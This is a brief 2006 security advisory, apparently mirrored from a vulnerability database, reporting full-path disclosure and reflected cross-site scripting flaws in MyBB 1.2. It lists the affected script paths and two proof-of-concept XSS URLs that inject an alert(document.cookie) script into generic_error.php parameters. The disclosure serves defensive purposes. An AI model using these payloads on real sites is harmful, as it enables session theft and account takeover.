Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14332
HistorySep 19, 2006 - 12:00 a.m.

MyBB 1.2 Full path and Cross site scripting vulnerabilities

2006-09-1900:00:00
vulners.com
24

Hello

Title : MyBB 1.2 Full path and Cross site scripting vulnerabilities
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : [email protected]

Full path
inc/generic_error.php?message=1
inc/datahandlers/event.php
inc/datahandlers/pm.php
inc/datahandlers/post.php
inc/datahandlers/user.php

Full path and Xss
inc/generic_error.php?message=<script>alert(document.cookie);</script>
inc/generic_error.php?message=1&code=<script>alert(document.cookie);</script>

WwW.SoQoR.NeT